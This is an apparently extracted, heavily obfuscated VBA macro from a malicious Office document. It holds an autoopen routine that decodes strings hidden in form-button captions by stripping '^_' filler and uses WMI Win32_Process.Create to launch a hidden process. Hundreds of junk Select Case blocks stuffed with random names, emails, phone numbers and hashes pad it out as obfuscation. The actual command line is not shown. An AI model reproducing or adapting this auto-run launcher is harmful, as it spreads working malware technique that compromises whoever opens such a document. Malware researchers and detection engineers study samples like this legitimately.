Attribute VB_Name = "Arcpcohwkok"
Attribute VB_Base = "0{D5B49AEF-81EF-48D6-9223-5E9C165D7C86}{5D6C243E-FFDC-45AB-AE1A-4CA04A04F727}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Cbpbcyjai"
Attribute VB_Name = "Ctfuztehi"
Function qkws(asdoqwA21, asdoqwA22, asdoqwA23)
On Error Resume Next
   Select _
 Case _
 Lwmslkjac
      Case _
      Joywnuepfq
      Yjaznrcc = Kskouikeujf
         Eqktdefn = Hex(Unjllwja / Udflyawfav)
         Jhwicxzxrbwnp = Atn(Wyikiicgak - Ciamsgydbpct)
         Yvshsvxo = Slonhbvxe
      Case _
      Prpdhqwkhwpyh
         Ntscxoitu = Sin(Lwaufojfjedd)
         Aeskdmhdb = "Chips"
         Eceigyuw = Akmrapcac
         Hxxjqirukiv = "Computer"
      Case _
      Amfwcgjgvzzu
         Cxfcydmxegyq = Cfxfxuqn
         Ywaimxypk = CVar(Xffwifdhyyl)
End _
 Select
Set asdoqwA211 = asdoqw(asdoqwA21)
   Select _
 Case _
 Epfqpvvpni
      Case _
      Fwqgscegjsle
      Ilkzxdeokza = Evvxzjue
         Kdfuhdme = Hex(Ynjfoliqqlrg / Zloumvcl)
         Awsiwlyvze = Atn(Lpjoadntldj - Wprsfrnjafrs)
         Fnvhpwizylyu = Kxwmnnawgctmq
      Case _
      Krvajifpwt
         Wqgultpzcj = Sin(Mtjgsndgb)
         Tctoqeiateb = "Henryka.Banas9@yahoo.com"
         Aihtbhiam = Qyywiqclicm
         Eyutilblqdgk = "71-530-46-64"
      Case _
      Etfnhnfyrg
         Ccqudorqocnp = Odzusmcg
         Coedlghohrjy = CVar(Astpvcfqvhzcy)
End _
 Select
qkws = asdoqwA211.Create(asdoqwA22, Ysdrkiupllxf, asdoqwA23, Fratwiagdf)
   Select _
 Case _
 Mbwoecyhtom
      Case _
      Aybkkzqywq
      Ikvmoivtyubpv = Xdpgobny
         Laarsqli = Hex(Scvffqpmgxlpd / Uhjzwulvjdiv)
         Dqgdkjuhj = Atn(Lasdrwxdyxjbi - Ggmcxung)
         Eltnznxjc = Tssgkrdjupxi
      Case _
      Nuhccyup
         Leqzjlrgki = Sin(Uvncjxhrgcl)
         Sphzmzewgv = "1f6fd1bfb801c239131b6d6087cb8ab2a8393bee6a08d4575cf38f0386664060"
         Ezixrxzp = Mpzowiff
         Fnrwkhyiisoz = "cd64fa55524bde24245bb8ab7f0d58a64fb0d08b69d5a55a3140aa443bc0980c"
      Case _
      Fyytpelu
         Cszydvqannvq = Njzrghmniy
         Jlpdhkbztshaf = CVar(Nlsfoqmf)
End _
 Select
End Function
Function asdoqw(asdoqwA)
On Error Resume Next
   Select _
 Case _
 Eytzdvgqfcynq
      Case _
      Oclwbpsgiuexh
      Bpkpoicxkduv = Saywxzjhnu
         Skfzxyykbj = Hex(Apmfashu / Ptgbksmucpfd)
         Rlgvxdkjwxvh = Atn(Gumofyul - Ofyhhnvxzunpm)
         Cjgxjfdfinhcq = Wgtjgsfdcicy
      Case _
      Qrhasdooojql
         Tzkeziyhvcf = Sin(Gdohgvmrwzcyu)
         Rktvrojcy = "59-848-21-40"
         Zujvfvnghkacj = Ywzifeeqplj
         Iwbqjhvria = "77-631-62-01"
      Case _
      Knvxrhjfd
         Dpruuetjvlb = Jkscuwpveb
         Jsxdaeirjya = CVar(Amorywjpjn)
End _
 Select
Set asdoqw = CreateObject(Ishdkhhzfcvp(Ishdkhhzfcvp(asdoqwA)))
   Select _
 Case _
 Giekitdoutsbs
      Case _
      Efrfibjf
      Nuaeasyrzgil = Sovqjsfmpzh
         Dcwwczquzdkua = Hex(Tvutsantgs / Nbeawotupd)
         Lvwslkwiy = Atn(Ueosyqipdgnc - Cnfgzvqlohwd)
         Vwnnsikvi = Dgnfzxscxixrb
      Case _
      Ciqgwuwauhsaj
         Gejlwodfoj = Sin(Wzxflosf)
         Bzbhgtygx = "969349bab6d1471e80dce861924051afbb62fc8f2b2c46d486997321f8915b59"
         Ncshqclzdbxr = Awchlqfiackjo
         Hhmvjjxeyu = "cd581feb7d935ac35f7e70888427379768f714297d199fc5b6b5471c5c0cc780"
      Case _
      Gyeehhhfx
         Lslfbqwgocpwt = Kqcremzjyjwyc
         Dmliadxdv = CVar(Nxfrbktk)
End _
 Select
End Function
Sub autoopen()
On Error Resume Next
   Select _
 Case _
 Wzbeqfwpmxt
      Case _
      Vatkecgheo
      Xjfjygrzjmrk = Yrywhlvgr
         Guukirkvj = Hex(Qforbsdijjly / Iihuzrrddrl)
         Avgoqndatip = Atn(Djrxvvrv - Dbjadmbwff)
         Nduulznp = Kxoimgvqftal
      Case _
      Gmaorlkezbv
         Akrikjlq = Sin(Uavbpzjbba)
         Yzzxnhfxmmy = "Ball"
         Folpcsxtafnw = Fpzunwmlrinw
         Pzibrgjkym = "Lilia.Stankiewicz14@gmail.com"
      Case _
      Iuyumbdma
         Skhitwccfon = Xledlurn
         Nrnxwlsrj = CVar(Prkypovjtt)
End _
 Select
   Select _
 Case _
 Mqglvpzjfkqk
      Case _
      Dxpxtqurpf
      Qsnhaybasj = Adbflotszu
         Mrnmbubaw = Hex(Gvxjriuttjexq / Galwlvvgujk)
         Xinopfujnfcke = Atn(Yiuxxloa - Yclpdagtvwlvp)
         Tfsvjmgush = Nrniizprcju
      Case _
      Vqjercsnm
         Weenrhshq = Sin(Bhndvapiklhq)
         Xpaeubbnhmdu = "19:d1:d6:62:9d:eb"
         Uqmutcpcrohrx = Uonrrurrcvkr
         Bzayqotznxkfv = "89-955-87-87"
      Case _
      Xcdxtnypdk
         Zjyjlbcq = Thpavbqgm
         Fesgtulckxol = CVar(Ponzesiyrjwi)
End _
 Select
Pvwqaydxogod
   Select _
 Case _
 Esxjeonffigph
      Case _
      Izgcosmqdse
      Ypkdfpgc = Ukylqkzoq
         Aokysdsc = Hex(Abmgqydkron / Lsphvfeenayy)
         Enmnaypt = Atn(Ezmveyypkv - Cwwwqmnao)
         Yyweamrdsjc = Tizocinebylqr
      Case _
      Dgiywjoxi
         Dtsgwzuadinyy = Sin(Lwzlojjjalbe)
         Ekqufftmvc = "32-194-10-22"
         Qazpijraxsxxf = Ksuuvonyxwdt
         Zawztsij = "Magorzata9@yahoo.com"
      Case _
      Rnfpmntp
         Itbiqhdcct = Qyxrbxlulai
         Hiylkdnb = CVar(Gzojlpfhrybw)
End _
 Select
   Select _
 Case _
 Uwddmntqdp
      Case _
      Pbgoyzfmxwa
      Ernowtaal = Zwvqxcle
         Gurluibymyw = Hex(Hwgcgwjpdvbpc / Oulvpqywwcc)
         Byhityouraeix = Atn(Ypwrfmks - Phjzjzem)
         Fotveouwtgn = Vyggkenrgth
      Case _
      Fvhbavnmxjv
         Qrnyhnyqnbd = Sin(Ixwyvmsnjzos)
         Efxolfxnvdim = "572fa6398617d7e74ecb30fe573dd7f54d97682583bcdf5a6c1e39e4749226b1"
         Arteihnpp = Iizhryfawtl
         Rnvubsqitmm = "48-720-84-07"
      Case _
      Kkzdopyzc
         Gdeclwlpbgmul = Wigpwnpmovb
         Vsnpqyoyo = CVar(Wbxqzxpokaspt)
End _
 Select
End Sub
Function Ishdkhhzfcvp(Whplztaogf)
On Error Resume Next
   Select _
 Case _
 Gijnxaamrfrtm
      Case _
      Silhltgcbfpv
      Cjeybzcagmt = Ayghkvixw
         Cfagiihfgyo = Hex(Vkcqsczngkg / Xfzkpgxqwvyw)
         Eoyjlcsmzsrfu = Atn(Wvtcnkcf - Hzxzoduzdu)
         Aubclfgtj = Paafufobic
      Case _
      Dunlpxgr
         Ouyakyxy = Sin(Wohyoyzuosrfa)
         Iyurvduspmfgt = "Fish"
         Ejzahomowry = Zjjticcz
         Hwbvsmirf = "72043062971612bf4f1e0227a51b4cfb52c6d0433f8eab597186fdb409adfadc"
      Case _
      Ohfaijvkxzxrs
         Dmyrsqbbs = Tubozsmdk
         Tzshpghj = CVar(Bnjwtoghn)
End _
 Select
   Select _
 Case _
 Xmeyeayiokpj
      Case _
      Ilatfmqhm
      Ahaajtrr = Zayzxvhbkmod
         Yuhrseqzbxesy = Hex(Qxseljkcu / Jfcqmwcabom)
         Hezyauexzwtpw = Atn(Qnsnjbvlxlki - Gqewuwhjmbadt)
         Jaqwijnwz = Mtcmqmnzsfosb
      Case _
      Hbqmfilcnk
         Hotufgxkog = Sin(Oqtrcuhotw)
         Fmkoaqobwa = "55-309-33-12"
         Zljmesxacg = Ptztdfslmho
         Ijxsxonkisrl = "71-870-62-79"
      Case _
      Bybjznvzhr
         Qiuyrwprviaie = Fgaihhvqmk
         Gzjcgwyxfpj = CVar(Vdotytfhbpsg)
End _
 Select
Tgzkaifcvk = Whplztaogf
   Select _
 Case _
 Jijtthjwo
      Case _
      Tounydoie
      Kfzxfssn = Vikmojgw
         Vswedxueplqnz = Hex(Etwcrebhdyfjb / Ilghhriuuiyn)
         Miidojpkug = Atn(Ktgxntuudfgs - Vybutqdyq)
         Gnafyranmhpow = Tcggcqeho
      Case _
      Zmdrlcqzg
         Peoffmyfkezo = Sin(Sknhbflo)
         Njvvnxxoyyn = "083349b8786457481c64a632f4b11aabdbd66a8ea87dedf392edd7495130da6c"
         Wksijgdayfqt = Seajboxr
         Dsmhkpznqsq = "Salad"
      Case _
      Wchnqpdfbv
         Jyplmufp = Ruvpigcdz
         Vdgtbgcrkbwsd = CVar(Jcdxlghrlnra)
End _
 Select
Ishdkhhzfcvp = Replace(Tgzkaifcvk, "^_", "")
   Select _
 Case _
 Btvqhrshxzfu
      Case _
      Gteefefmpoxq
      Fgmvugjv = Rdnjcigrsm
         Fwpmopehsq = Hex(Brnkadkkorm / Vjhhgyqcwap)
         Rurxubpyi = Atn(Wqpcpuojnwtf - Lrynfqxetlqtr)
         Msnxmkqjnm = Gslyouyjkq
      Case _
      Vxswdmwd
         Bdfijouikbder = Sin(Nbytnbvij)
         Stfbqyuhrhs = "68-456-80-42"
         Jobgjaqggo = Ykexfvwfuw
         Jkfkjuav = "Berta.Chojnowski22@yahoo.com"
      Case _
      Jzzpyjlile
         Rnpjlmvaqmm = Yugwmnuplafyq
         Umlwmstrua = CVar(Zuwxmasaoel)
End _
 Select
   Select _
 Case _
 Gvfvkkam
      Case _
      Roqjwtqcpf
      Qimszelnhgrwa = Wcnsysqwv
         Vgnfzuyi = Hex(Jrkwakekwtjao / Cngeamqnvjfac)
         Yrrhnkcwyillz = Atn(Ustfxgseeksd - Ujceyurjgfo)
         Iwparbaongw = Gnmwvhmjdyi
      Case _
      Rdlmnqwp
         Pkbbpyhdg = Sin(Odwjkhnhe)
         Tqkwdatgl = "Keyboard"
         Fxmtfxkvvclsc = Cdijhfjirkr
         Gkzkhsxyxqcq = "487ebce5731578101be4669b17a5d2aed1b42801c115cb0b79f37fbeebd42874"
      Case _
      Ceiyiwoypx
         Qwpujoepolca = Bqfmfskwge
         Ivgiuchobb = CVar(Homiurch)
End _
 Select
End Function

Attribute VB_Name = "Fazsaosffti"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Emotdryklvxlk, 0, 0, MSForms, CommandButton"
Attribute VB_Control = "Joyjqrwg, 1, 1, MSForms, CommandButton"
Attribute VB_Control = "Cwcgqwjfumqx, 2, 2, MSForms, CommandButton"
Attribute VB_Name = "Lplugjcu"
Function Pvwqaydxogod()
On Error Resume Next
   Select _
 Case _
 Zgywgteye
      Case _
      Kuasujsvgvdd
      Sfzlcdrhazmew = Zsmuztete
         Mmxlvcwznnen = Hex(Ddubfpnupgdqj / Nlugkrej)
         Khwkrufk = Atn(Qksyofrxrifst - Ckgrhyug)
         Hqjxlxgngndt = Ezhsgyroakpk
      Case _
      Oxveudgoizfk
         Mjwjpomiq = Sin(Zdtqyibznzirz)
         Lqqhmvzmbrog = "Pelagia79@hotmail.com"
         Gghtevanyk = Llgerxkx
         Ripezqsykcgph = "Car"
      Case _
      Yucrysfq
         Ngxzqvxgko = Avjvzaox
         Nctdigfdl = CVar(Tljuzthjj)
End _
 Select
Jugdyfvhoje = "^_^_wi^_^_nm^_^_^_gm^_^_t^_s:^_^_Wi^_^_n3^_2^_^__P^_ro^_^_ces^_s^_"
   Select _
 Case _
 Mrzwvqcbh
      Case _
      Hbnvdqfb
      Dsyrhvwbaeel = Biughvnpx
         Xhdzlfuhli = Hex(Enufzgew / Fuvwzueg)
         Wfkotcpzjdpz = Atn(Psmqnjsgp - Idpgzceu)
         Zdgmxrfms = Soggiotec
      Case _
      Nmkzatjbkfx
         Pfdqrmtwlwq = Sin(Zrolpboip)
         Yrmcraau = "Car"
         Rckcnpwtcqt = Trnzpwohzkcs
         Rfkvweri = "Florian.Wypych@hotmail.com"
      Case _
      Iclspnei
         Skdblxwjrsikm = Nruwfzlcj
         Lwslgtdaig = CVar(Kzhiqxvypw)
End _
 Select
Sgjmsbxyi = Ishdkhhzfcvp(Ishdkhhzfcvp(Fazsaosffti.Joyjqrwg _
.Caption + Fazsaosffti.Cwcgqwjfumqx _
.Caption))
   Select _
 Case _
 Aeizlqzju
      Case _
      Tyvbawuj
      Wbghoqruvaf = Nlfzcvjdhy
         Avyptlcvre = Hex(Swahozgv / Ipuxsohkoc)
         Ovsfcocvujidh = Atn(Cpirvhnmiuwt - Hpzmuieojws)
         Szgrpmtfu = Tqbikkguog
      Case _
      Jrmxqnglzczu
         Dghvimkp = Sin(Gweyqxeaf)
         Acodrotlrqgvi = "Gloves"
         Nsyajuyiqtjhv = Zohdddtsryqdb
         Awsrjlcfwdbux = "Shoes"
      Case _
      Hyitqsned
         Ahcsqwuqsnpd = Xjkabjviir
         Ixhnrovplvcd = CVar(Agqvsuqht)
End _
 Select
   Select _
 Case _
 Oetggring
      Case _
      Ulunviehumfy
      Jlosfmba = Syxxsqxftyt
         Ildvelsjgqe = Hex(Tubypuxfv / Goepzeeiav)
         Bqwovflit = Atn(Wcdvizlkno - Qhcjblvwkoo)
         Tfbajorgb = Wiwiokrsib
      Case _
      Swkxxdcio
         Ptjkezbioap = Sin(Omhzwvsfmzid)
         Tczzysuhpfz = "Pizza"
         Gtsgcjqjlvcl = Icuahfiigo
         Tzgxcajcmmts = "1cfd02f175eb7ba7f127e7c3ebb0d08564e2e094cdcee49f877520e90ce57f46"
      Case _
      Ihigwnfhleue
         Kxmdflprc = Ccqzvibuowaa
         Nlmnbcxiasoz = CVar(Udrfunukpip)
End _
 Select
Set Wwvpvvmkgosur = CreateObject(Ishdkhhzfcvp(Ishdkhhzfcvp(Ishdkhhzfcvp(Fazsaosffti.Emotdryklvxlk.Caption))))
   Select _
 Case _
 Rfkqrvvwtd
      Case _
      Bddliuzm
      Qziiijmwd = Roeiqwwfru
         Buyedeutxvip = Hex(Inlkxzasj / Csydganoegnje)
         Jlnwgpxinitg = Atn(Uikkgalv - Uuagbvegceq)
         Nhifkkumt = Kxczyhgnvwb
      Case _
      Rhsemeslgdx
         Vblvdaemwdsfi = Sin(Ctilwtocrpzpy)
         Ufwbmecz = "Bacon"
         Hcvdazek = Mvmfehytf
         Fksjmihita = "Mojzesz.Flak55@yahoo.com"
      Case _
      Kpqszrqvfdt
         Tqxefitopbrcu = Xbbhsgbqnoz
         Igbraktrkdn = CVar(Aunyqedz)
End _
 Select
   Select _
 Case _
 Lxoqkaoqyxlj
      Case _
      Suevweixd
      Mdsryvhs = Mifhktxx
         Mhlyoiokymo = Hex(Oxxvzacd / Fglzolkla)
         Pfrtdqgwuzmsi = Atn(Nyyxhlwags - Azobozbyr)
         Vjvgwhsn = Eymmcmntf
      Case _
      Ahgxfyys
         Rhxcnlfatoea = Sin(Abolnofmvzub)
         Qiuuvqmrpk = "89-486-17-83"
         Ismwwahl = Kmfsnflx
         Xwkktkejij = "9d:25:b6:7e:59:9d"
      Case _
      Wnfmazdu
         Lmyipcdh = Bcdmibcmwycn
         Prnaemuor = CVar(Xmlubgaduc)
End _
 Select
   Select _
 Case _
 Yvimezzomgcev
      Case _
      Nruxdevgq
      Fcrtkbjn = Trupzakj
         Bvpjyvsf = Hex(Osnetxxt / Vibbtzah)
         Lxxzykmh = Atn(Idvfobeqwcc - Settnpyvlc)
         Rvofikqyhrs = Nsvkkbbukeuer
      Case _
      Wtxbhoxfpkns
         Ebmhwaxdkabm = Sin(Ruarlycou)
         Ipmfzxiob = "3b:25:56:5d:54:2b"
         Hxuyusiw = Rqovjwhnqqgv
         Kkxldsyvanm = "Karol_Jezierski56@gmail.com"
      Case _
      Ndjgxqkrzxjpa
         Lqwmvgnj = Thwwqbjhatkgk
         Swlnovcqx = CVar(Rahpztpiei)
End _
 Select
Wwvpvvmkgosur.ShowWindow = True And False
   Select _
 Case _
 Gqvevtiu
      Case _
      Ptzewdmuf
      Uhexzqqqzhvzb = Mlshgjsg
         Ybwmcpmscli = Hex(Vcrdrxtuy / Qabyjpcbujapu)
         Sigytrvewfogb = Atn(Uzcavbnojmj - Xvmxzteknzeeu)
         Tvjbrepam = Veuxmkjzgb
      Case _
      Ghefgzxvaei
         Cipriuadpxa = Sin(Nuuvqdbectn)
         Boyirwzjj = "5a:12:5a:f0:67:33"
         Ixhrmrjeoqmd = Netjaocra
         Fhgergesbn = "Chair"
      Case _
      Jrlkjlrolxddr
         Jnrqwoghkdaxk = Zruijsoetg
         Zhdcmlhvf = CVar(Widkbginhgbym)
End _
 Select
   Select _
 Case _
 Srorxebbzivaa
      Case _
      Yvvmptfame
      Oejvggcpt = Phfppxnwdtwfm
         Tdnqcnvxnwq = Hex(Uxdrzwgejep / Hynryxbrmycdw)
         Ksszkycfqegp = Atn(Kyxnegxjvy - Xhybodlmtr)
         Szetxnshogc = Prewawtgy
      Case _
      Gopceaqsmiue
         Miglwqfy = Sin(Lgqsusiuyjmix)
         Npjnwumd = "e8d45de2752c7ec960d756d21d85dfab87616df870bc205a87fe9ca8aa384847"
         Onvbkphrqqy = Xtzagrrdkqjjb
         Bezcxegfns = "67-429-46-15"
      Case _
      Ergzddrluwug
         Kdwmsjux = Rvmtqomhsy
         Erfgjjqeks = CVar(Udibafzhathhq)
End _
 Select
   Select _
 Case _
 Cierthkdw
      Case _
      Uolgmxre
      Lqglrrsg = Qcvwyugmse
         Uvoicpisnok = Hex(Rxfcqswwhjr / Isqfmltvwkx)
         Cyhycspfhwb = Atn(Mjtmlwon - Bhbzlvvnhtc)
         Ojhzejavpvlyk = Ybubvhgqat
      Case _
      Ljtqyxkede
         Egvlmqabul = Sin(Ybtqishgb)
         Lwembzwgudk = "Janusz71@gmail.com"
         Muejsbpavms = Twkwrier
         Heybxftcnee = "Car"
      Case _
      Oxnzkopjmoy
         Vxmbsxce = Tasubjety
         Wydjucugu = CVar(Wwkwqmlg)
End _
 Select
Rteqqgivmp = qkws(Jugdyfvhoje, Sgjmsbxyi, Wwvpvvmkgosur)
   Select _
 Case _
 Usyszinytfu
      Case _
      Cjpfzwbvgsd
      Dhlqzqwzjhw = Assucikfrp
         Mfovoavjjff = Hex(Fdoptcsb / Jdlquyklrtanl)
         Uhbuzumf = Atn(Evqynzovifrcj - Ytotcssgly)
         Hqcwyuuqcun = Lrccmsxbiaay
      Case _
      Dmoeasihegi
         Pjjegkara = Sin(Ygxpzpbxm)
         Enpnllemvts = "018ec50c2cce7ba74eb32bb62d45d4c6c9a206bf7e482947e90187e551bf0aed"
         Rzwtolxdw = Tusipelhc
         Votyomnuk = "Patrycjusz.Cichocki50@hotmail.com"
      Case _
      Qxztijbimickt
         Wxriliimdiap = Pbzzxeuivw
         Tmxteahwq = CVar(Cunhlwkh)
End _
 Select
   Select _
 Case _
 Krbqkkmydgvw
      Case _
      Kjosfjzxbwj
      Zsxlacknp = Afcenzdixpn
         Cgssnpegcfmf = Hex(Uukduearahvk / Bkpmiciujsaa)
         Xzpygejom = Atn(Gulflwcnlfsp - Dmaksdudsubrx)
         Jmxdtcixoyvxm = Fkpadsie
      Case _
      Yccretzyq
         Ulhvvollwfio = Sin(Qcwafbidvuz)
         Kfvzvojly = "55-817-72-42"
         Iewsycqol = Qdylzkrqmvo
         Gagmzhds = "Angela.Muszynski28@gmail.com"
      Case _
      Raeqfsdluew
         Akoythujtwvl = Eoezuvmgkvumy
         Uderifclij = CVar(Hyejehwz)
End _
 Select
End Function



' InQuest injected base64 decoded content
' g:wN7
' 5s]yq
' {Oxq

INQUEST-PP=macro
